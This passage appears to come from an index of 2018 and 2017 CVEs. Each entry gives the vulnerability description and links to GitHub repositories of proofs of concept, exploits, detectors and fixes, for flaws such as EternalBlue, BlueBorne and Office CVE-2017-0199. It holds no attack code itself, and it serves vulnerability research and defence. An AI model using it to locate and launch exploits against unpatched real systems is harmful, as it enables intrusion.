CVE.

- [tylepr96/CVE-2018-1000030](https://github.com/tylepr96/CVE-2018-1000030)

### CVE-2018-1000082 (2018-03-13)

Ajenti version 2 contains a Cross Site Request Forgery (CSRF) vulnerability in the command execution panel of the tool used to manage the server that can result in code execution on the server. Being a CSRF, the attack requires victim interaction: when the victim accesses the trigger of the CSRF, any code matching the victim's privileges on the server can be executed.

- [SECFORCE/CVE-2018-1000082-exploit](https://github.com/SECFORCE/CVE-2018-1000082-exploit)

### CVE-2018-1000117 (2018-03-07)

Python Software Foundation CPython versions from 3.2 until 3.6.4 on Windows contain a Buffer Overflow vulnerability in the os.symlink() function on Windows that can result in arbitrary code execution, likely escalation of privilege. This attack appears to be exploitable via a Python script that creates a symlink with an attacker-controlled name or location. This vulnerability appears to have been fixed in 3.7.0 and 3.6.5.

- [u0pattern/CVE-2018-1000117-Exploit](https://github.com/u0pattern/CVE-2018-1000117-Exploit)

### CVE-2018-1000134 (2018-03-16)

UnboundID LDAP SDK versions from commit 801111d8b5c732266a5dbd4b3bb0b6c7b94d7afb up to commit 8471904a02438c03965d21367890276bc25fa5a6 (where the issue was reported and fixed) contain an Incorrect Access Control vulnerability: the process function in the SimpleBindRequest class doesn't check for an empty password when running in synchronous mode. The commit with the applied fix is https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6#diff-f6cb23b459be1ec17df1da33760087fd. This can result in the ability to impersonate any valid user. This attack appears to be exploitable by providing a valid username and an empty password against servers that do not do additional validation as per https://tools.ietf.org/html/rfc4513#section-5.1.1. This vulnerability appears to have been fixed after commit 8471904a02438c03965d21367890276bc25fa5a6.

- [dragotime/cve-2018-1000134](https://github.com/dragotime/cve-2018-1000134)

### CVE-2018-1000140 (2018-03-23)

rsyslog librelp version 1.2.14 and earlier contains a Buffer Overflow vulnerability in the checking of x509 certificates from a peer that can result in remote code execution. This attack appears to be exploitable by a remote attacker that can connect to rsyslog and trigger a stack buffer overflow by sending a specially crafted x509 certificate.

- [s0/rsyslog-librelp-CVE-2018-1000140](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140)
- [s0/rsyslog-librelp-CVE-2018-1000140-fixed](https://github.com/s0/rsyslog-librelp-CVE-2018-1000140-fixed)

### CVE-2018-1000199 (2018-05-24)

The Linux Kernel version 3.18 contains a dangerous feature vulnerability in modify_user_hw_breakpoint() that can result in a crash and possibly memory corruption. This attack appears to be exploitable via local code execution and the ability to use ptrace. This vulnerability appears to have been fixed in git commit f67b15037a7a50c57f72e69a6d59941ad90a0f0f.

- [dsfau/CVE-2018-1000199](https://github.com/dsfau/CVE-2018-1000199)

### CVE-2018-1000224 (2018-08-20)

Godot Engine, all versions prior to 2.1.5 and all 3.0 versions prior to 3.0.6, contains signed/unsigned comparison, wrong buffer size checks, integer overflow, and missing padding initialization vulnerabilities in the (de)serialization functions (core/io/marshalls.cpp) that can result in DoS (packet of death) and possible leak of uninitialized memory. This attack appears to be exploitable via a malformed packet received over the network by a Godot application that uses built-in serialization (e.g. game server, or game client). It could be triggered by a multiplayer opponent. This vulnerability appears to have been fixed in 2.1.5, 3.0.6, and the master branch after commit feaf03421dda0213382b51aff07bd5a96b29487b.

- [zann1x/ITS](https://github.com/zann1x/ITS)

### CVE-2018-1000529 (2018-06-26)

Grails Fields plugin version 2.2.7 contains a Cross Site Scripting (XSS) vulnerability when using the display tag that can result in XSS. This vulnerability appears to have been fixed in 2.2.8.

- [martinfrancois/CVE-2018-1000529](https://github.com/martinfrancois/CVE-2018-1000529)

### CVE-2018-1000542 (2018-06-26)

netbeans-mmd-plugin version <= 1.4.3 contains an XML External Entity (XXE) vulnerability in MMD file import that can result in possible information disclosure, server-side request forgery, or remote code execution. This attack appears to be exploitable via a specially crafted MMD file.

- [forse01/CVE-2018-1000542-NetBeans](https://github.com/forse01/CVE-2018-1000542-NetBeans)

### CVE-2018-1000802 (2018-09-18)

Python Software Foundation Python (CPython) version 2.7 contains a CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in the shutil module (make_archive function) that can result in denial of service or information gain via injection of arbitrary files on the system or entire drive. This attack appears to be exploitable via passage of unfiltered user input to the function. This vulnerability appears to have been fixed after commit add531a1e55b0a739b0f42582f1c9747e5649ace.

- [tna0y/CVE-2018-1000802-PoC](https://github.com/tna0y/CVE-2018-1000802-PoC)

### CVE-2018-1000844 (2018-12-20)

Square Open Source Retrofit versions prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437 contain an XML External Entity (XXE) vulnerability in JAXB; an attacker could use this to remotely read files from the file system or to perform SSRF. This vulnerability appears to have been fixed after commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437.

- [epicosy/Retrofit-1](https://github.com/epicosy/Retrofit-1)

### CVE-2018-1000861 (2018-12-10)

A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.

- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION)
- [smokeintheshell/CVE-2018-1000861](https://github.com/smokeintheshell/CVE-2018-1000861)

### CVE-2018-1002105 (2018-12-05)

In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.

- [gravitational/cve-2018-1002105](https://github.com/gravitational/cve-2018-1002105)
- [evict/poc_CVE-2018-1002105](https://github.com/evict/poc_CVE-2018-1002105)
- [imlzw/Kubernetes-1.12.3-all-auto-install](https://github.com/imlzw/Kubernetes-1.12.3-all-auto-install)
- [bgeesaman/cve-2018-1002105](https://github.com/bgeesaman/cve-2018-1002105)
- [sh-ubh/CVE-2018-1002105](https://github.com/sh-ubh/CVE-2018-1002105)

### CVE-2018-1999002 (2018-07-23)

An arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.

- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins)
- [0x6b7966/CVE-2018-1999002](https://github.com/0x6b7966/CVE-2018-1999002)

## 2017
### CVE-2017-0005 (2017-03-17)

The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges via a crafted application, aka "Windows GDI Elevation of Privilege Vulnerability." This vulnerability is different from those described in CVE-2017-0001, CVE-2017-0025, and CVE-2017-0047.

- [sheri31/0005poc](https://github.com/sheri31/0005poc)

### CVE-2017-0037 (2017-02-26)

Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.

- [chattopadhyaykittu/CVE-2017-0037](https://github.com/chattopadhyaykittu/CVE-2017-0037)

### CVE-2017-0038 (2017-02-20)

gdi32.dll in Graphics Device Interface (GDI) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information from process heap memory via a crafted EMF file, as demonstrated by an EMR_SETDIBITSTODEVICE record with modified Device Independent Bitmap (DIB) dimensions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-3216, CVE-2016-3219, and/or CVE-2016-3220.

- [k0keoyo/CVE-2017-0038-EXP-C-JS](https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS)

### CVE-2017-0055 (2017-03-17)

Microsoft Internet Information Server (IIS) in Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to perform cross-site scripting and run script with local user privileges via a crafted request, aka "Microsoft IIS Server XSS Elevation of Privilege Vulnerability."

- [NetJBS/CVE-2017-0055-PoC](https://github.com/NetJBS/CVE-2017-0055-PoC)

### CVE-2017-0065 (2017-03-17)

Microsoft Edge allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Microsoft Browser Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0009, CVE-2017-0011, CVE-2017-0017, and CVE-2017-0068.

- [Dankirk/cve-2017-0065](https://github.com/Dankirk/cve-2017-0065)

### CVE-2017-0075 (2017-03-17)

Hyper-V in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows guest OS users to execute arbitrary code on the host OS via a crafted application, aka "Hyper-V Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0109.

- [4B5F5F4B/HyperV](https://github.com/4B5F5F4B/HyperV)
- [belyakovvitagmailt/4B5F5F4Bp](https://github.com/belyakovvitagmailt/4B5F5F4Bp)
- [MarkusCarelli1/4B5F5F4Bp](https://github.com/MarkusCarelli1/4B5F5F4Bp)

### CVE-2017-0089 (2017-03-17)

Uniscribe in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Uniscribe Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0072, CVE-2017-0083, CVE-2017-0084, CVE-2017-0086, CVE-2017-0087, CVE-2017-0088, and CVE-2017-0090.

- [rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training](https://github.com/rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training)

### CVE-2017-0100 (2017-03-17)

A DCOM object in Helppane.exe in Microsoft Windows 7 SP1; Windows Server 2008 R2; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows local users to gain privileges via a crafted application, aka "Windows HelpPane Elevation of Privilege Vulnerability."

- [cssxn/CVE-2017-0100](https://github.com/cssxn/CVE-2017-0100)

### CVE-2017-0106 (2017-04-12)

Microsoft Excel 2007 SP3, Microsoft Outlook 2010 SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted document, aka "Microsoft Office Memory Corruption Vulnerability."

- [ryhanson/CVE-2017-0106](https://github.com/ryhanson/CVE-2017-0106)

### CVE-2017-0108 (2017-03-17)

The Windows Graphics Component in Microsoft Office 2007 SP3; 2010 SP2; and Word Viewer; Skype for Business 2016; Lync 2013 SP1; Lync 2010; Live Meeting 2007; Silverlight 5; Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; and Windows 7 SP1 allows remote attackers to execute arbitrary code via a crafted web site, aka "Graphics Component Remote Code Execution Vulnerability." This vulnerability is different from that described in CVE-2017-0014.

- [homjxi0e/CVE-2017-0108](https://github.com/homjxi0e/CVE-2017-0108)

### CVE-2017-0143 (2017-03-17)

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.

- [valarauco/wannafind](https://github.com/valarauco/wannafind)
- [NatteeSetobol/Etern-blue-Windows-7-Checker](https://github.com/NatteeSetobol/Etern-blue-Windows-7-Checker)
- [h3xcr4ck3r/MS17-010_CVE-2017-0143](https://github.com/h3xcr4ck3r/MS17-010_CVE-2017-0143)
- [SampatDhakal/Metasploit-Attack-Report](https://github.com/SampatDhakal/Metasploit-Attack-Report)

### CVE-2017-0144 (2017-03-17)

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.

- [peterpt/eternal_scanner](https://github.com/peterpt/eternal_scanner)
- [kimocoder/eternalblue](https://github.com/kimocoder/eternalblue)
- [EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution](https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution)
- [quynhold/Detect-CVE-2017-0144-attack](https://github.com/quynhold/Detect-CVE-2017-0144-attack)
- [ducanh2oo3/Vulnerability-Research-CVE-2017-0144](https://github.com/ducanh2oo3/Vulnerability-Research-CVE-2017-0144)
- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)
- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)

### CVE-2017-0145 (2017-03-17)

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.

- [MelonSmasher/chef_tissues](https://github.com/MelonSmasher/chef_tissues)

### CVE-2017-0147 (2017-03-17)

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via crafted packets, aka "Windows SMB Information Disclosure Vulnerability."

- [RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A](https://github.com/RobertoLeonFR-ES/Exploit-Win32.CVE-2017-0147.A)

### CVE-2017-0148 (2017-03-17)

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.

- [HakaKali/CVE-2017-0148](https://github.com/HakaKali/CVE-2017-0148)

### CVE-2017-0199 (2017-04-12)

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

- [ryhanson/CVE-2017-0199](https://github.com/ryhanson/CVE-2017-0199)
- [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199)
- [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199)
- [NotAwful/CVE-2017-0199-Fix](https://github.com/NotAwful/CVE-2017-0199-Fix)
- [haibara3839/CVE-2017-0199-master](https://github.com/haibara3839/CVE-2017-0199-master)
- [Exploit-install/CVE-2017-0199](https://github.com/Exploit-install/CVE-2017-0199)
- [mzakyz666/PoC-CVE-2017-0199](https://github.com/mzakyz666/PoC-CVE-2017-0199)
- [n1shant-sinha/CVE-2017-0199](https://github.com/n1shant-sinha/CVE-2017-0199)
- [kn0wm4d/htattack](https://github.com/kn0wm4d/htattack)
- [joke998/Cve-2017-0199](https://github.com/joke998/Cve-2017-0199)
- [joke998/Cve-2017-0199-](https://github.com/joke998/Cve-2017-0199-)
- [sUbc0ol/Microsoft-Word-CVE-2017-0199-](https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-)
- [viethdgit/CVE-2017-0199](https://github.com/viethdgit/CVE-2017-0199)
- [nicpenning/RTF-Cleaner](https://github.com/nicpenning/RTF-Cleaner)
- [herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199](https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199)
- [jacobsoo/RTF-Cleaner](https://github.com/jacobsoo/RTF-Cleaner)
- [likekabin/CVE-2017-0199](https://github.com/likekabin/CVE-2017-0199)
- [stealth-ronin/CVE-2017-0199-PY-KIT](https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT)
- [Phantomlancer123/CVE-2017-0199](https://github.com/Phantomlancer123/CVE-2017-0199)
- [BRAINIAC22/CVE-2017-0199](https://github.com/BRAINIAC22/CVE-2017-0199)
- [Sunqiz/CVE-2017-0199-reprofuction](https://github.com/Sunqiz/CVE-2017-0199-reprofuction)
- [TheCyberWatchers/CVE-2017-0199-v5.0](https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0)
- [kash-123/CVE-2017-0199](https://github.com/kash-123/CVE-2017-0199)

### CVE-2017-0204 (2017-04-12)

Microsoft Outlook 2007 SP3, Microsoft Outlook 2010 SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to bypass the Office Protected View via a specially crafted document, aka "Microsoft Office Security Feature Bypass Vulnerability."

- [ryhanson/CVE-2017-0204](https://github.com/ryhanson/CVE-2017-0204)

### CVE-2017-0213 (2017-05-12)

Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214.

- [shaheemirza/CVE-2017-0213-](https://github.com/shaheemirza/CVE-2017-0213-)
- [zcgonvh/CVE-2017-0213](https://github.com/zcgonvh/CVE-2017-0213)
- [billa3283/CVE-2017-0213](https://github.com/billa3283/CVE-2017-0213)
- [likekabin/CVE-2017-0213](https://github.com/likekabin/CVE-2017-0213)
- [jbooz1/CVE-2017-0213](https://github.com/jbooz1/CVE-2017-0213)
- [eonrickity/CVE-2017-0213](https://github.com/eonrickity/CVE-2017-0213)
- [Jos675/CVE-2017-0213-Exploit](https://github.com/Jos675/CVE-2017-0213-Exploit)
- [Anonymous-Family/CVE-2017-0213](https://github.com/Anonymous-Family/CVE-2017-0213)

### CVE-2017-0248 (2017-05-12)

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to bypass Enhanced Security Usage taggings when they present a certificate that is invalid for a specific use, aka ".NET Security Feature Bypass Vulnerability."

- [rubenmamo/CVE-2017-0248-Test](https://github.com/rubenmamo/CVE-2017-0248-Test)

### CVE-2017-0261 (2017-05-12)

Microsoft Office 2010 SP2, Office 2013 SP1, and Office 2016 allow a remote code execution vulnerability when the software fails to properly handle objects in memory, aka "Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0262 and CVE-2017-0281.

- [kcufId/eps-CVE-2017-0261](https://github.com/kcufId/eps-CVE-2017-0261)
- [erfze/CVE-2017-0261](https://github.com/erfze/CVE-2017-0261)

### CVE-2017-0263 (2017-05-12)

The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."

- [R06otMD5/cve-2017-0263-poc](https://github.com/R06otMD5/cve-2017-0263-poc)

### CVE-2017-0290 (2017-05-09)

The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 does not properly scan a specially crafted file leading to memory corruption, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability."

- [homjxi0e/CVE-2017-0290-](https://github.com/homjxi0e/CVE-2017-0290-)

### CVE-2017-0358 (2018-04-13)

Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.

- [Wangsafz/cve-2017-0358.sh](https://github.com/Wangsafz/cve-2017-0358.sh)

### CVE-2017-0411 (2017-02-08)

An elevation of privilege vulnerability in the Framework APIs could enable a local malicious application to execute arbitrary code within the context of a privileged process. This issue is rated as High because it could be used to gain local access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 7.0, 7.1.1. Android ID: A-33042690.

- [lulusudoku/PoC](https://github.com/lulusudoku/PoC)

### CVE-2017-0478 (2017-03-08)

A remote code execution vulnerability in the Framesequence library could enable an attacker using a specially crafted file to execute arbitrary code in the context of an unprivileged process. This issue is rated as High due to the possibility of remote code execution in an application that uses the Framesequence library. Product: Android. Versions: 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33718716.

- [bingghost/CVE-2017-0478](https://github.com/bingghost/CVE-2017-0478)
- [likekabin/CVE-2017-0478](https://github.com/likekabin/CVE-2017-0478)

### CVE-2017-0505 (2017-03-08)

An elevation of privilege vulnerability in MediaTek components, including the M4U driver, sound driver, touchscreen driver, GPU driver, and Command Queue driver, could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: N/A. Android ID: A-31822282. References: M-ALPS02992041.

- [R0rt1z2/CVE-2017-0505-mtk](https://github.com/R0rt1z2/CVE-2017-0505-mtk)

### CVE-2017-0541 (2017-04-07)

A remote code execution vulnerability in sonivox in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing. This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-34031018.

- [C0dak/CVE-2017-0541](https://github.com/C0dak/CVE-2017-0541)
- [likekabin/CVE-2017-0541](https://github.com/likekabin/CVE-2017-0541)

### CVE-2017-0554 (2017-04-07)

An elevation of privilege vulnerability in the Telephony component could enable a local malicious application to access capabilities outside of its permission levels. This issue is rated as Moderate because it could be used to gain access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33815946.

- [lanrat/tethr](https://github.com/lanrat/tethr)

### CVE-2017-0564 (2017-04-07)

An elevation of privilege vulnerability in the kernel ION subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-34276203.

- [guoygang/CVE-2017-0564-ION-PoC](https://github.com/guoygang/CVE-2017-0564-ION-PoC)

### CVE-2017-0781 (2017-09-14)

A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146105.

- [ojasookert/CVE-2017-0781](https://github.com/ojasookert/CVE-2017-0781)
- [X3eRo0/android712-blueborne](https://github.com/X3eRo0/android712-blueborne)
- [mjancek/BlueborneDetection](https://github.com/mjancek/BlueborneDetection)
- [CrackSoft900/Blue-Borne](https://github.com/CrackSoft900/Blue-Borne)
- [CarlosDelRosario7/sploit-bX](https://github.com/CarlosDelRosario7/sploit-bX)
- [DamianSuess/Learn.BlueJam](https://github.com/DamianSuess/Learn.BlueJam)

### CVE-2017-0785 (2017-09-14)

An information disclosure vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146698.

- [ojasookert/CVE-2017-0785](https://github.com/ojasookert/CVE-2017-0785)
- [aymankhalfatni/CVE-2017-0785](https://github.com/aymankhalfatni/CVE-2017-0785)
- [Alfa100001/-CVE-2017-0785-BlueBorne-PoC](https://github.com/Alfa100001/-CVE-2017-0785-BlueBorne-PoC)
- [Hackerscript/BlueBorne-CVE-2017-0785](https://github.com/Hackerscript/BlueBorne-CVE-2017-0785)
- [pieterbork/blueborne](https://github.com/pieterbork/blueborne)
- [sigbitsadmin/diff](https://github.com/sigbitsadmin/diff)
- [RavSS/Bluetooth-Crash-CVE-2017-0785](https://github.com/RavSS/Bluetooth-Crash-CVE-2017-0785)
- [sh4rknado/BlueBorn](https://github.com/sh4rknado/BlueBorn)
- [Joanmei/CVE-2017-0785](https://github.com/Joanmei/CVE-2017-0785)
- [CyberKimathi/Py3-CVE-2017-0785](https://github.com/CyberKimathi/Py3-CVE-2017-0785)
- [MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-](https://github.com/MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-)

### CVE-2017-0806 (2017-10-03)

An elevation of privilege vulnerability in the Android framework (gatekeeperresponse). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-62998805.

- [michalbednarski/ReparcelBug](https://github.com/michalbednarski/ReparcelBug)

### CVE-2017-0807 (2017-10-03)

An elevation of privilege vulnerability in the Android framework (ui framework). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2. Android ID: A-35056974.

- [kpatsakis/PoC_CVE-2017-0807](https://github.com/kpatsakis/PoC_CVE-2017-0807)

### CVE-2017-75
- [CalebFIN/EXP-CVE-2017-75](https://github.com/CalebFIN/EXP-CVE-2017-75)

### CVE-2017-1235 (2017-09-25)

IBM WebSphere MQ 8.0 could allow an authenticated user to cause a premature termination of a client application thread which could potentially cause denial of service. IBM X-Force ID: 123914.

- [11k4r/CVE-2017-1235_exploit](https://github.com/11k4r/CVE-2017-1235_exploit)

### CVE-2017-1635 (2017-12-13)

IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.

- [emcalv/tivoli-poc](https://github.com/emcalv/tivoli-poc)
- [bcdannyboy/cve-2017-1635-PoC](https://github.com/bcdannyboy/cve-2017-1635-PoC)

### CVE-2017-2368 (2017-02-20)

An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. The issue involves the "Contacts" component. It allows remote attackers to cause a denial of service (application crash) via a crafted contact card.

- [vincedes3/CVE-2017-2368](https://github.com/vincedes3/CVE-2017-2368)

### CVE-2017-2370 (2017-02-20)

An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app.

- [maximehip/extra_recipe](https://github.com/maximehip/extra_recipe)
- [JackBro/extra_recipe](https://github.com/JackBro/extra_recipe)
- [Rootkitsmm-zz/extra_recipe-iOS-10.2](https://github.com/Rootkitsmm-zz/extra_recipe-iOS-10.2)
- [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370)

### CVE-2017-2388 (2017-04-02)

An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "IOFireWireFamily" component. It allows attackers to cause a denial of service (NULL pointer dereference) via a crafted app.

- [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref)

### CVE-2017-2636 (2017-03-07)

Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.

- [alexzorin/cve-2017-2636-el](https://github.com/alexzorin/cve-2017-2636-el)

### CVE-2017-2666 (2018-07-27)

It was discovered in Undertow that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own.

- [tafamace/CVE-2017-2666](https://github.com/tafamace/CVE-2017-2666)

### CVE-2017-2671 (2017-04-05)

